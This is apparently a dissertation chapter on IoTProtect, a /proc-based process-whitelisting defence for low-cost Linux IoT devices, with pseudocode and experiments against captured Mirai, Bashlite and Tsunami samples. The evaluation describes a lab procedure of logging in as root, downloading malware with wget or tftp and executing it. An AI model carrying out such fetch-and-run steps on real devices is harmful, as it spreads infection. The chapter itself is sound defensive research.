Linux is a free OS developed by many companies and groups. The GNU/Linux system is the core component, from which many different Linux distributions have branched off [96]. These distributions, such as Fedora, Ubuntu, Debian, and Mandriva Linux, share a common design called the “proc” filesystem, which provides system information to users and applications. This filesystem is not associated with any hardware device such as a disk drive. Instead, “proc” is an interface to the running Linux kernel. Files in the “proc” filesystem are objects that behave similarly to normal files but provide access to parameters, data structures, and statistics in the kernel. The contents of these files are not fixed; the Linux kernel generates them on the fly when a file is read. For embedded Linux systems, users can use open source tools such as the Yocto Project to produce their own distribution [97]. The Yocto tool retains support for the “proc” and “sys” filesystems [98]. Therefore, users and applications can read process information through “proc” on an embedded Linux system as long as the device developers allow it.

The “proc” filesystem contains a directory entry for each process running on a Linux system.

The name of each directory is the process identifier (ID) of the corresponding process. These

directories appear and disappear dynamically as processes start and terminate on the system. Each

directory contains several entry files providing information regarding the running process [99].

There are three entry files that contain pathname or filename information regarding the binary of

the corresponding process:

• The “exe” file is a symbolic link that points to the executable image running in the process.

• The “maps” file lists the memory regions currently mapped into the process’s address space: the address range of each region, the permissions on those addresses, the pathname of the mapped file, and other information.

• The “cmdline” file records the complete command line for the process unless the process is a zombie or a kernel thread. For a zombie process, the file is empty [100].

As shown in Fig. 21, users and applications can find the pathname of the running process.

Moreover, if there is a whitelist of benign binaries' pathnames, we can distinguish normal and

abnormal processes.
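The way these entries yield a pathname that can be compared against a whitelist can be sketched as follows. This is a minimal illustration in Python, not the dissertation's implementation: the function names, the sample lines, and the whitelist content are assumptions made for the example, and the parsing relies only on the whitespace-separated field layout of “maps” and the NUL-separated layout of “cmdline”.

```python
from typing import Optional


def maps_pathname(line: str) -> Optional[str]:
    """Return the pathname field of one /proc/[pid]/maps line, or None if blank."""
    # Fields: address range, permissions, offset, device, inode, optional pathname.
    fields = line.split(None, 5)
    if len(fields) < 6:
        return None  # blank pathname field, i.e. an anonymous mapping
    # Note: pseudo-paths such as "[heap]" are returned unchanged.
    return fields[5].strip()


def cmdline_args(raw: bytes) -> list:
    """Split the NUL-separated content of /proc/[pid]/cmdline into arguments."""
    return [arg.decode(errors="replace") for arg in raw.split(b"\0") if arg]


def is_whitelisted(pathname: Optional[str], whitelist: set) -> bool:
    """A process is treated as normal only if its pathname is on the whitelist."""
    return pathname is not None and pathname in whitelist


# Hypothetical sample data, for illustration only.
sample = "00400000-0040b000 r-xp 00000000 1f:02 123        /bin/busybox"
anonymous = "7f2c1000-7f2c3000 rw-p 00000000 00:00 0"
whitelist = {"/bin/busybox"}

print(maps_pathname(sample), is_whitelisted(maps_pathname(sample), whitelist))
print(maps_pathname(anonymous), cmdline_args(b"/bin/sh\0-c\0ls\0"))
```

On a live system the same functions could be fed with the content of `/proc/<pid>/maps` and `/proc/<pid>/cmdline`; the sketch works on strings so that it can be tried without access to a device.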


Fig. 21 Format of the maps [100]

6.2.2. Files in IoT devices

In this method, we focus on Linux-based IoT devices because many open-source OSs for IoT devices, such as Brillo, OpenWrt, and Ostro Linux, are based on Linux distributions [101]. Linux has a single hierarchical directory structure that starts from the root directory, represented by “/”, and then expands into sub-directories. The Filesystem Hierarchy Standard (FHS) defines the directory structure and contents in most Linux distributions [102]. However, IoT devices can use various kinds of storage, such as flash storage, and a single device can therefore contain multiple filesystems. For example, the ASUS Wi-Fi router RT-AC3200 mounts nine filesystems, according to the “/proc/mounts” file shown in Fig. 22. The format and meaning of each line are as follows [100] [103]:

1. The first field specifies the device that is mounted.

2. The second field specifies the mount point.

3. The third field specifies the filesystem type.

4. The fourth field lists the mount options, including whether the filesystem is mounted read-only (ro) or read-write (rw).

5. The fifth field is used by the “dump” command to determine which filesystems are to be dumped.

6. The sixth field is used by the “fsck” command to determine the order in which filesystem checks are performed at boot time.

Fig. 22 Filesystems of ASUS Wi-Fi router RT-AC3200
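The six-field layout described above can be parsed with a few lines of code. The following Python sketch is illustrative only: the class name, the helper name, and the two sample lines are assumptions and are not taken from the router in Fig. 22. It treats the fourth field as a comma-separated option list that carries the ro/rw flag.

```python
from typing import NamedTuple


class MountEntry(NamedTuple):
    device: str        # field 1: mounted device
    mount_point: str   # field 2: mount point
    fs_type: str       # field 3: filesystem type
    options: tuple     # field 4: mount options, including ro or rw
    dump: int          # field 5: used by "dump"
    fsck_order: int    # field 6: used by "fsck"

    @property
    def read_only(self) -> bool:
        return "ro" in self.options


def parse_mount_line(line: str) -> MountEntry:
    """Parse one whitespace-separated line in the /proc/mounts format."""
    device, mount_point, fs_type, options, dump, fsck_order = line.split()
    return MountEntry(device, mount_point, fs_type,
                      tuple(options.split(",")), int(dump), int(fsck_order))


# Hypothetical sample lines, for illustration only.
root_entry = parse_mount_line("/dev/root / squashfs ro,relatime 0 0")
tmp_entry = parse_mount_line("tmpfs /tmp tmpfs rw,relatime 0 0")
print(root_entry.fs_type, root_entry.read_only)
print(tmp_entry.fs_type, tmp_entry.read_only)
```

Knowing the filesystem type and the read-only flag of each mount point is what later allows files to be grouped by the kind of filesystem they live on.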

The “rootfs” filesystem is a simple filesystem that exports Linux's disk caching mechanisms as a dynamically resizable random access memory (RAM)-based filesystem [104]. “Squashfs” is a compressed read-only filesystem for Linux, intended for general read-only filesystem use and for archival use [105]. “Devtmpfs” lets the kernel create a tmpfs instance very early at kernel initialization, before any driver-core device is registered; every device then provides a device node in “devtmpfs”, and users can change its contents at any time [106]. The “proc” filesystem contains system information, and the files in “/proc” are generated by the kernel on the fly [99]. The “tmpfs” filesystem is a temporary file storage facility on many Unix-like operating systems. It does not use traditional non-volatile media to store file data; instead, “tmpfs” files exist solely in virtual memory maintained by the kernel [107]. “Sysfs” is a pseudo filesystem provided by the Linux kernel that exports information regarding various kernel subsystems, hardware devices, and associated device drivers [108]. “Devpts” is a virtual filesystem available in the Linux kernel since version 2.1.93 (April 1998). It is usually mounted at /dev/pts and contains solely device files representing slaves to the multiplexing master located at /dev/ptmx [109]. “JFFS2” is a log-structured filesystem designed for use on flash devices in embedded systems. It is based on the work begun in the original JFFS by Axis Communications AB [110]. The “usbfs” filesystem is dynamically generated, similar to the “proc” filesystem. “Usbfs” complements the normal device node system and can be used to write user space device drivers [111].

Based on the privileges and features of these filesystems, we categorize three kinds of files in

Linux-based IoT devices:

• Writable files

• Read-only files

• On-the-fly files

Writable files are those that come from user-writable filesystems. Most of them are input/output (I/O) files of the system or configuration files. Read-only files come from mounted images or read-only filesystems. They are the libraries and applications that provide the functions and services of IoT devices. On-the-fly files are files that reside in the “proc” or “usbfs” filesystems, reside in the kernel, or are generated dynamically by users. The whitelist criteria are simple. First, ignore on-the-fly files because they are system information entries or come from USB devices mounted from outside the device. Second, create the whitelist of pathnames from read-only files, since a read-only filesystem holds many libraries and executable files. Finally, create the whitelist of hash values from writable files. For example, there are 14,514 files in the ASUS RT-AC3200 Wi-Fi router. The distribution of the files is shown in Fig. 23. Of these files, 79% are on-the-fly files generated by the kernel. Therefore, the number of files to be whitelisted is only 3,048.
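The three-way categorization and the resulting whitelist criteria can be written down compactly. The sketch below is an illustration under stated assumptions: the set of on-the-fly filesystem types contains only the types named in the text and would have to be extended per device, and the function names are hypothetical. The last lines re-derive the file count quoted for the RT-AC3200.

```python
# Filesystem types treated as on-the-fly (assumption: only those named in the text).
ON_THE_FLY_FS = {"proc", "sysfs", "usbfs"}


def classify(fs_type: str, read_only: bool) -> str:
    """Map a file's filesystem type and mount mode to one of the three categories."""
    if fs_type in ON_THE_FLY_FS:
        return "on-the-fly"
    return "read-only" if read_only else "writable"


def whitelist_kind(category: str):
    """Return which whitelist covers the category, or None if files are ignored."""
    return {"on-the-fly": None, "read-only": "pathname", "writable": "hash"}[category]


print(classify("proc", False), whitelist_kind(classify("proc", False)))
print(classify("squashfs", True), whitelist_kind(classify("squashfs", True)))
print(classify("jffs2", False), whitelist_kind(classify("jffs2", False)))

# Arithmetic check of the example: 14,514 files, 79% of them on-the-fly.
total_files = 14514
to_whitelist = round(total_files * (1 - 0.79))
print(to_whitelist)
```

With 21% of 14,514 files remaining, the computation gives the 3,048 files stated in the text.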


Fig. 23 Distribution of ASUS RT-AC3200 files

6.2.3. Major premises of IoTProtect

We assume that IoTProtect is implemented by the device developers and uses the whitelists they created. There are four conditions. First, the checker and whitelists must be merged into the kernel or executed in the initial process to prevent attackers or malware from killing the checker process. Second, we assume that the developers do not use the “mmap” function to produce anonymous mappings. When the pathname field of an entry in the “maps” file in “/proc” is blank, the entry is an anonymous mapping as obtained via the “mmap” function of the C language. There is no easy means of coordinating this back to a process's source, as there is no field giving the pathname [100]. Therefore, this is a constraint under which the developers must develop their devices in order to implement IoTProtect. More precisely, when loading files into memory, they must not set the "MAP_ANONYMOUS" flag when creating memory mappings. Third, the exe entries in “/proc” can sometimes lose their links to the files they point to. Under Linux 2.2 and later, the exe entry in “/proc” is a symbolic link containing the actual pathname of the executed command. Attempting to open an exe entry will indeed open the original executable, and the symbolic link can typically be dereferenced. However, if the pathname has been unlinked, the symbolic link will contain the string '(deleted)' appended to the original pathname. In a multithreaded process, the contents of this symbolic link are not available if the main thread has already been terminated [100]. Developers must not dereference the exe link to create hash values of the executable binaries. Moreover, the hash algorithm must be available on the IoT device. Note that we use MD5 for the actual implementation of IoTProtect tested in the following evaluation. Fourth, if the developer would like to apply whitelists of cmdline content, the libraries and application files must be allocated in read-only partitions. Furthermore, the full or unique pathname of the corresponding binaries must be included in the command line to prevent file replacement or false positives.
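The third condition concerns exe links whose target has been unlinked. A small Python sketch of how such a link target could be recognized is given below. It is an assumption-laden illustration rather than part of IoTProtect: the helper names are hypothetical, and the suffix constant reflects the marker that Linux appends to the original pathname, with a leading space.

```python
import os
from typing import Optional, Tuple

# Marker appended to the link target when the executable has been unlinked.
DELETED_SUFFIX = " (deleted)"


def split_exe_target(target: str) -> Tuple[str, bool]:
    """Return (original pathname, was_unlinked) for an exe link target string."""
    if target.endswith(DELETED_SUFFIX):
        return target[: -len(DELETED_SUFFIX)], True
    return target, False


def read_exe_target(pid: int) -> Optional[str]:
    """Read the exe link of a process; None if it is unavailable or not permitted."""
    try:
        return os.readlink(f"/proc/{pid}/exe")
    except OSError:
        return None


# Hypothetical link targets, for illustration only.
print(split_exe_target("/tmp/.x (deleted)"))
print(split_exe_target("/bin/busybox"))
```

A file whose real name happens to end in the same marker would be misread by this simple check, so a production checker would need an additional test; the sketch only shows the common case.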

6.3. IoTProtect

IoTProtect is a whitelisting method for protecting low-cost IoT devices. IoTProtect consists of

three whitelists and a checker program. The pathname whitelist is a list of pathnames of all

legitimate executables. The hash value whitelist records MD5 hash values of binaries on IoT

devices. The comparison and whitelist of cmdline content are optional and performed only if there

are processes that cannot display their pathname and exe links in the “proc” filesystem.

We first explain the creation of whitelists. Here we assume that the device to be protected has already been developed and that the device developer is to install IoTProtect on top of the existing system. We skip the files coming from on-the-fly filesystems, such as sysfs, proc, and usbfs, as well as I/O files. If developers know precisely which executable files to include on the whitelist, they can create their own whitelist manually. However, recent IoT products are often not developed by a single manufacturer, and each developer does not know exactly all of the legitimate executables. In such a case, developers can still create whitelists that include all executables existing in the system by using the Linux command “find” with the “-exec” expression and “md5sum.” Moreover, the cmdline whitelist can be created with the Linux commands “find,” with the “-exec” expression, and “cat.”
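The worst-case whitelist creation described above, which the prototype performs with “find” and “md5sum,” can be mirrored in a few lines of Python. The sketch below is an analogous illustration, not the dissertation's script: the function names and the throwaway file are assumptions, and the executable test uses the permission bits visible to the current user.

```python
import hashlib
import os
import tempfile


def md5_of_file(path):
    """Return the hexadecimal MD5 digest of a file, read in chunks."""
    digest = hashlib.md5()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_whitelists(root):
    """Collect pathnames and MD5 hashes of executable regular files under root."""
    pathnames, hashes = set(), set()
    for directory, _subdirs, files in os.walk(root):
        for name in files:
            path = os.path.join(directory, name)
            if os.path.isfile(path) and os.access(path, os.X_OK):
                pathnames.add(path)
                hashes.add(md5_of_file(path))
    return pathnames, hashes


# Demonstration on a throwaway directory (hypothetical file name and content).
with tempfile.TemporaryDirectory() as root:
    exe_path = os.path.join(root, "httpd")
    with open(exe_path, "wb") as handle:
        handle.write(b"#!/bin/sh\necho hello\n")
    os.chmod(exe_path, 0o755)
    pathnames, hashes = build_whitelists(root)
    print(sorted(pathnames), sorted(hashes))
```

On a device, `root` would be a mounted filesystem that is not on-the-fly, and the two sets would be stored as the pathname and hash value whitelists.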

IoTProtect conducts process checks through the following steps. The input data come from

entry files of the “proc” filesystem and whitelists. The output is the removal of malicious

processes. The notations used in the pseudocode are shown in Table 28.

Table 28 Table of symbols.

| Notations | Definitions and Descriptions |
|---|---|
| T | Integer variable, the period of process checker |
| N | Integer variable, number of processes to be checked |
| M | Set of /proc/[pid]/maps files |
| Cmd | Set of /proc/[pid]/cmdline files |
| CL | Set of cmdline |
| PN | Set of pathnames |
| WLP, WLH, WLC | Whitelists of the pathname, hash value, and cmdline |
| Pn1, Pn2 | Entity of pathname |
| Pid1, Pid2 | Entity of process id |
| E1, E2 | Entity of exe links |
| H1, H2 | Entity of hash value |
| SP | Set of suspicious process id |
| Cl1, Cl2 | Entity of cmdline content |
| MD5 (Ei) | Calculate the MD5 hash value of the linked binary |
| Comp (S, WL) | Comparison of set S and whitelists |
| Kill (S) | Kill the process of set S by its Pid |
| Sleep (t) | Pause process checker of IoTProtect for t seconds |
| ← | Assignment |
| - | Remove entities from the set |
| A, B, C, D | Sets |
| \|D\| | Size of set ‘D’ |

We explain the details of the IoTProtect procedures with the following pseudocode:

while true
    find and grep Pni from M, i = 1 to n
    PN ← {Pn1, Pn2, …, Pnn}
    Comp (PN, WLP)
    SP ← {Pid1, Pid2, …, Pidj} ∀Pidi ∈ A: Pni ∉ WLP, i = 1 to j
    Hj ← MD5(Ej) ∀Ej ∈ B: Pidj ∈ SP, j = 1 to |SP|
    H ← {H1, H2, …, Hj}, j = 1 to |SP|
    Comp (H, WLH)
    SP – {Pid1, Pid2, …, Pidk} ∀Pidk ∈ C: Hk ∈ WLH
    /* begin optional step of cmdline whitelisting */
    find and grep Cli from Cmd, i = 1 to n
    CL ← {Cl1, Cl2, …, Cli}, i = 1 to n
    Comp (CL, WLC)
    SP – {Pid1, Pid2, …, Pidr} ∀Pidr ∈ D: Clr ∈ WLC
    /* end optional step of cmdline whitelisting */
    Kill (SP)
    Sleep (T)
endwhile

IoTProtect first selects the processes whose pathnames are not included in the pathname whitelist and marks them as suspicious. It then removes from the suspicious set the processes whose binaries match the hash value whitelist. If there are any processes with no pathname and exe links, it further filters the remainder with the cmdline whitelist. Finally, it kills all processes that remain in the suspicious set.
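One pass of this procedure can be sketched as a pure function over a snapshot of process information. The Python code below is a hedged illustration, not the shell prototype: the `ProcInfo` structure, the function name, and the sample processes are assumptions, and the final kill step is left to the caller.

```python
from typing import Dict, NamedTuple, Optional, Set


class ProcInfo(NamedTuple):
    pathname: Optional[str]  # pathname taken from maps/exe, None if unavailable
    exe_md5: Optional[str]   # MD5 of the linked binary, None if unavailable
    cmdline: str             # content of the cmdline entry


def suspicious_pids(procs: Dict[int, ProcInfo],
                    wl_path: Set[str],
                    wl_hash: Set[str],
                    wl_cmd: Optional[Set[str]] = None) -> Set[int]:
    """Return the process IDs that one check pass would kill."""
    # Pathname check: anything not on the pathname whitelist becomes suspicious.
    sp = {pid for pid, info in procs.items() if info.pathname not in wl_path}
    # Hash check: drop suspicious processes whose binary hash is whitelisted.
    sp -= {pid for pid in sp if procs[pid].exe_md5 in wl_hash}
    # Optional cmdline check: drop processes whose command line is whitelisted.
    if wl_cmd is not None:
        sp -= {pid for pid in sp if procs[pid].cmdline in wl_cmd}
    return sp


# Hypothetical snapshot, for illustration only.
procs = {
    1: ProcInfo("/sbin/init", "aaa", "/sbin/init"),
    42: ProcInfo("/tmp/mirai", "bbb", "/tmp/mirai"),
    77: ProcInfo("/jffs/app", "ccc", "/jffs/app"),
    90: ProcInfo(None, None, "/usr/bin/daemon -f"),
}
result = suspicious_pids(procs, {"/sbin/init"}, {"ccc"}, {"/usr/bin/daemon -f"})
print(result)
```

A periodic checker would call this function, send a kill signal to each returned process ID, and then sleep for the configured period before the next pass.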

6.4. Evaluation

We developed a prototype of IoTProtect using shell and AWK scripts with Linux commands such as grep, find, and head. For evaluation, we conducted experiments with four actual IoT devices and 4,981 malware binaries captured by our IoT honeypot. We present three different experiments to evaluate the effectiveness and overhead of IoTProtect.

6.4.1. Data collection and experimental devices

We chose four IoT devices for conducting experiments. These devices were known to be

vulnerable and compromised by IoT malware [112] [113] [114]. The brands and specifications of

the devices are listed in Table 29. According to their disk information, the commercial products listed in Table 27 cannot be installed on the four devices. The Dahua IPC-HFW3300 does not support MD5 hash libraries. Therefore, on this IP camera, IoTProtect checks only the pathnames and cmdline of the corresponding processes.

Table 29 IoT devices used in conducting the experiments.

| IoT Device | Type | CPU Arch. | CPU spec. | RAM (MB) | Disk (MB) | Appr. Price |
|---|---|---|---|---|---|---|
| Dahua IPC-HFW3300 | IP Camera | ARM | 300 MHz | 92 | 8 | 325 USD |
| ASUS RT-AC3200 | Wi-Fi Router | ARM | 1 GHz, 2 cores | 256 | 30.8 | 199.99 USD |
| ASUS RT-N66U | Wi-Fi Router | MIPSEL | 600 MHz | 256 | 22.3 | 84.99 USD |
| PRINCETON ShAirDisk | Wi-Fi storage | MIPSEL | 360 MHz | 28 | 4.6 | 26.7 USD |

IoTPOT collected 4,981 different IoT malware binaries for ARM and MIPSEL from January 2016 to March 2017. The malware labels, such as Bashlite, Tsunami, and Mirai, come from local scans by the Kaspersky anti-virus engine. Based on our previous experience of submitting 12,000 samples to the VirusTotal web service application programming interface (API), we consider Kaspersky to be one of the most reliable anti-virus products for IoT malware [115]. VirusTotal is a website that aggregates many antivirus products and online scan engines [116]. The distribution of our malware samples is shown in Table 30.

Table 30 IoT malware used for conducting the experiments.

| CPU | Bashlite | Tsunami | Mirai | Sum |
|---|---|---|---|---|
| ARM | 3123 | 51 | 74 | 3248 |
| MIPSEL | 1514 | 27 | 192 | 1733 |
| All | 4637 | 78 | 266 | 4981 |

6.4.2. Removal experiment

6.4.2.1. Design of experiment

We conducted experiments involving the malware removal process on the four IoT devices as

follows:

1. Log in to the device as root via telnet.

2. Download the malware using the “wget” or “tftp” command.

3. Assign the “755” permission to the malware binary.

4. Execute the downloaded malware.

5. Conduct a process check using IoTProtect.

6. Check whether IoTProtect can kill the malware process.

6.4.2.2. Experimental Results

The results are shown in Table 31. Many of the malware binaries caused segmentation faults (7% to 14%) or bus errors (0% to 0.8%) when executed on these devices. Two ARM malware binaries and one MIPSEL binary finished execution before we started the process check of IoTProtect. These three malware binaries are similar and contain the same functions. All they attempted was to install Python on the target devices using “apt-get” and “yum.” When the installation failed because these installation utilities were not available on the devices, the malware simply terminated. The complete execution of the malware took less than one second, and the process disappeared after termination. The purpose of the malware is to infect an IoT OS on which Python can be installed, such as the IBM Watson IoT Platform [117]. IoTProtect successfully removed the processes of all but these three malware binaries. The success rate of removal by IoTProtect against triggered malware was 99.92% if the above three cases are considered failed protection, but 100% if they are considered successful protection because the malware could not function properly.

Table 31 Results of the removal experiments.

| IoT Device | Type | CPU Arch. | Kill | Segmentation fault | Bus error | Fail |
|---|---|---|---|---|---|---|
| IPC-HFW3300 | IP Camera | ARM | 2774 | 446 | 26 | 2 |
| RT-AC3200 | Wi-Fi Router | ARM | 2732 | 483 | 31 | 2 |
| RT-N66U | Wi-Fi Router | MIPSEL | 1608 | 123 | 1 | 1 |
| ShAirDisk | Wi-Fi storage | MIPSEL | 1622 | 108 | 2 | 1 |

The overheads of IoTProtect on the four devices are shown in Table 32. The disk overheads include the sizes of the whitelists. The size of the IoTProtect checker program is only 1.6 kB. Our pathname whitelist includes all of the pathnames from the read-only filesystem; the manufacturer of a device might use a more efficient whitelist. The central processing unit (CPU) overheads are the maximum values during execution. The three devices other than the IPC-HFW3300 can finish a process check of IoTProtect within four seconds. Although the IP camera spent 44 seconds executing the checker program, the original monitor and display systems of the camera functioned normally without delays.

Table 32 IoTProtect overheads.

| IoT Device | Type | Disk overhead | CPU overhead | Time cost |
|---|---|---|---|---|
| IPC-HFW3300 | IP Camera | 124.5K | 24% | 44 sec |
| RT-AC3200 | Wi-Fi Router | 288.4K | 7% | 2 sec |
| RT-N66U | Wi-Fi Router | 176.5K | 17.6% | 2 sec |
| ShAirDisk | Wi-Fi storage | 155.5K | 19% | 4 sec |

6.4.3. Mitigating outgoing attacks

In practice, IoTProtect would continuously check existing processes at some designated time interval. Therefore, it is important to ask whether IoTProtect is sufficiently fast to kill a malware process before it conducts outgoing attacks against other devices. To measure the worst case, we chose a Mirai variant, one of the fastest spreading IoT worms, which conducts a telnet scan on port 2323/tcp right after its execution, even before connecting to its command-and-control server. The MD5 hash value of the sample is “d6e99a59d44b83e8360745145fa5d2b3.”

6.4.3.1. Design of experiment

As shown in Fig. 24, we conducted the experiment on the ASUS RT-AC3200 Wi-Fi Router. All traffic was contained in a LAN. At the beginning of the experiment, we executed the malware. After a fixed interval, we executed IoTProtect to conduct a process check. To simulate different detection timings, we started the process check of IoTProtect at 1, 5, 10, 20, 30, and 60 seconds after malware execution, respectively. We then measured how many packets went out from the device before the IoTProtect checker killed the malware process. We conducted this trial 100 times for each setting.

Fig. 24 Experimental environment for measuring outgoing attack mitigation by IoTProtect


6.4.3.2. Experimental results

The results of the experiment are illustrated in Fig. 25. The results confirm that IoTProtect cannot block every scan by Mirai but does reduce the number of scan packets significantly. Measurement shows that this Mirai variant generates nearly 2,000 scan packets in the first minute after it begins execution and would continue to scan at the same rate if it were not killed by IoTProtect.

Fig. 25 Results of experiment on mitigating outgoing attacks

6.4.4. Trade-off between security and device performance

We measured the impact of IoTProtect on the performance of the devices. We chose a low-cost

device, ShAirDisk, and analyzed the trade-off between the security and overhead of IoTProtect.

6.4.4.1. Experimental design

As illustrated in Fig. 26, we conducted this experiment in a location at which there were no

other Wi-Fi access points. Then, we uploaded a 200 MB file five times into Wi-Fi storage to

measure the device performance for uploading files. We conducted this experiment under two

conditions, one with only IoTProtect running and the other with IoTProtect and malware running.


The same procedure as in the previous experiment was followed for malware execution. The MD5

hash of the Mirai variant used for this experiment is “018cb18e9cb415af453ee020fa33aa28.”

Fig. 26 Experimental environment for measuring the trade-off between performance and security

6.4.4.2. Experimental results

Fig. 27 presents the upload times under different process check intervals of IoTProtect. In the figure, the blue bars show the average upload times with only IoTProtect running, and the orange bars show the average upload times with both malware and IoTProtect running. The differences between the orange and blue bars at the same interval are not significant, measuring less than 12.4 seconds. This means that the malware infection delayed the file upload by less than 12.4 seconds. However, if we shorten the interval of IoTProtect process checks to 1.0 second to increase security, the overhead increases significantly, measuring a 55% increase in upload time compared to the case without IoTProtect. On the other hand, intervals of more than 30 seconds do not harm performance significantly.


Fig. 27 Results of experiment measuring trade-off

6.4.5. Evaluation of easy deployment

The deployment of IoTProtect involves two steps: the creation of whitelists and the installation of the IoTProtect checker. We created worst-case whitelists because we are not the developers of these devices. These whitelists exclude only “sysfs,” “proc,” and “usbfs” files and I/O files. The time costs are shown in Table 33. General users can create worst-case whitelists in only a few minutes.

Table 33 Cost of creating whitelists.

| IoT Device | Type | Whitelists size | Whitelists time cost |
|---|---|---|---|
| IPC-HFW3300 | IP Camera | 123.0K | *29 sec |
| RT-AC3200 | Wi-Fi Router | 285.9K | 218 sec |
| RT-N66U | Wi-Fi Router | 175.0K | 157 sec |
| ShAirDisk | Wi-Fi storage | 154.0K | 188 sec |

*This IP camera lacks hash libraries and contains some processes without pathname and valid exe links. We created the cmdline whitelist instead of hash value whitelists.

The installation procedure for the IoTProtect checker is light and quick. The checker program is written as Bash scripts, which makes it portable between different Linux distributions. Moreover, the size of the checker program is only 1.5KB, which makes it easy to deploy on low-cost IoT devices. Finally, the installation procedure includes only copying a file and assigning the execute permission. The checker script runs independently of most Linux kernel modules. Users can easily invoke it in the Linux startup process and have it run in the background or as a daemon.

6.5. Discussion

From the removal experiment, we see that our method applies to different CPU architectures

and models of IoT devices. Furthermore, IoTProtect successfully removed several thousand

different malware processes with nearly 100% success. According to the mitigation of outgoing

attacks, IoTProtect reduced the scan attack traffic caused by a rapidly spreading Mirai variant,

even if the process check is not very frequent. The results of the performance experiment show

that IoTProtect can be installed in some low-cost devices without a significant drop in

performance if the process checking interval is configured appropriately.

We found that IoTProtect was considerably slower on one of the tested devices, the Dahua IP Camera, as shown in Table 32. We could improve the performance of IoTProtect by implementing it in the C language and by reducing the size of the whitelists. According to a comparative study of programming languages in 2015, C is the best language for computing-intensive tasks [118]. Moreover, the worst-case whitelists we created for the experiments contain thousands of pathnames and MD5 hash values. Manufacturers can build much better whitelists for their products.


For mitigating outgoing attacks, we find that IoTProtect cannot block all outgoing scan packets. It can remove the malware process, but the malware has already sent thousands of scan packets before it is killed. We consider this shortcoming to be a limitation of IoTProtect. If we shorten the interval of IoTProtect’s process checks from 60 seconds to 20 seconds, the number of scan packets is reduced by 66%. Moreover, an interval of one second could stop 96.72% of the scan packets that could have been sent out in one minute. Note that, as the worst-case scenario, we used a Mirai variant, one of the fastest known IoT worms, that begins scanning right after execution. However, most Mirai malware would connect to the command-and-control server first and then start the scan and DoS attack after receiving commands. Hence, in most real cases, IoTProtect could have blocked most of the outgoing attacks within an acceptable time interval.
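The relationship between check delay and scan traffic can be approximated with a back-of-the-envelope model. The Python sketch below is not the measurement procedure: it assumes a constant scan rate and an instantaneous kill at the moment the check starts, both of which are simplifications, and the function names are hypothetical.

```python
def expected_scan_packets(delay_s: float, rate_per_s: float) -> float:
    """Packets sent before the kill, assuming a constant scan rate."""
    return delay_s * rate_per_s


def reduction_vs_window(delay_s: float, window_s: float = 60.0) -> float:
    """Fraction of the packets of a full window that are avoided by killing at delay_s."""
    return 1.0 - delay_s / window_s


# Roughly 2,000 packets per minute, as measured for the tested Mirai variant.
rate = 2000 / 60
for delay in (1, 20, 60):
    print(delay, expected_scan_packets(delay, rate), reduction_vs_window(delay))
```

Under these assumptions a 20-second delay avoids about 66.7% of the packets of a one-minute window, in line with the reported 66%, while a one-second delay avoids about 98.3%, slightly above the measured 96.72%; the simple model ignores the time the check itself takes to run.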

Our performance experiment on Wi-Fi storage shows that the file upload speed of the device is

significantly affected by the interval of IoTProtect’s process check. On the tested Wi-Fi storage

devices, the best interval can be 20 to 30 seconds, which will introduce a 7.1% to 12.4% increase

in file upload time while protecting from and mitigating most of the attacks by the malware

infection, as discussed above.

IoTProtect is easy to deploy, but creating proper whitelists can take some effort. If developers use third-party libraries and an open source OS for their IoT products, they might know only the processes created by their own applications and have limited information about all of the other benign processes. In such a case, the developers must include all executable files installed on the device, such as the files in “/bin” and “/usr/bin,” as we did in the experiment. When they conduct software testing, they must record all of the created processes to avoid false positive detection by IoTProtect.


6.5.1. Comparison with previous studies

• The method by Paleari et al. relies on QEMU and behavior clustering [32], which are too expensive to implement on low-cost devices.

• Shahzad et al. analyzed 11 features from the kernel and achieved 93% detection accuracy [33]. However, the system requires many features, executes a decision tree algorithm, and is difficult to install on low-cost devices. IoTProtect, in contrast, was able to remove 99.92% of malware processes from four thousand malware binaries. We assume here that our method does not cause false positives as long as the whitelist is created appropriately by the device developers. However, as discussed in the previous section, the creation of whitelists can involve difficulties during the manufacturing process. Our future work will include investigating proper whitelisting.

• Tamiya et al. investigated a simple solution for malware removal by rebooting the device, which can be applied to low-cost IoT devices [34]. However, they do not offer a methodology for detecting the malware infection, and they also mention that connected vulnerable devices would be infected again after removal unless the vulnerability is fixed. Therefore, their solution would not be able to defend the device.

• There are platform and resource constraint issues for McAfee Embedded Control 6.x. Such solutions cannot be installed on low-cost IoT devices. Moreover, McAfee Embedded Control 6.x must rebuild the kernel when installed on a Linux distribution, introducing significant engineering cost, especially if deployed on existing commercial products.

• Koike et al. developed a whitelisting-type execution control module, “WhiteEgret,” on Linux [35]. Similarly to McAfee Embedded Control, WhiteEgret requires rebuilding the Linux kernel upon installation, which also introduces substantial engineering cost.

6.5.2. Limitations

IoTProtect does have some limitations. Many of the limitations come from the design of Linux

process information and our whitelisting idea. First, IoTProtect depends on exe and maps entries

in the “proc” filesystem. Kernel-level malware and toolkits that disable or alter these

functionalities would evade detection by IoTProtect. Moreover, checks and removal by

IoTProtect are performed on filesystems, with the result that code injection on a legitimate process

in memory cannot be detected.

Second, the defense offered by IoTProtect is not prevention but mitigation of malware infection.

It would help substantially in defending against long-lasting malicious activities such as DDoS,

spamming, bitcoin mining, click fraud, and stepping stones for other attacks. On the other hand,

attacks that can be performed in a very short time, such as credential and privacy data exfiltration,

might not be mitigated well. Applying a whitelist before malware execution would require process

creation hooking. We did not choose this approach for two reasons. First, the hooking of process

creation would involve modification of the Linux kernel [119] and hence increase the deployment

cost for device developers. We believe that IoTProtect is easier to implement and use than the

hooking method. Second, hooking every process creation and checking all created processes

before they are executed would slow down the principal functionality of the devices, especially

at the time of device boot-up when many processes are created and checked.

For new IoT devices, developers can select and build their own secure OS distribution. However,

changing the OS on existing devices is not easy. First, extending the resources of a device is

difficult; if the RAM, CPU, or hard disk is insufficient, a secure OS cannot be installed on the

device. Second, changing the OS would require manufacturers to re-examine device test cases.

Test cases that include stability or burn-in testing, i.e., running devices at different voltages

for several months, would consume substantial labor and time. Third, some Linux security modules

are kernel space programs that apply a whitelist mechanism. Such modules affect the activation of

all kernel and user space applications. Installing such a module requires rebuilding the OS kernel and

re-examining all kernel and user space applications. IoTProtect, by contrast, is a user space application.

Therefore, developers and manufacturers need to examine only the user space applications; for example, user

applications cannot kill kernel processes. According to a Gartner report, more than 8.4

billion connected IoT devices have been in use worldwide since 2017 [1]. Moreover, most of these devices

lack defense mechanisms. IoTProtect is a simple solution for them, with lower development and

testing costs.

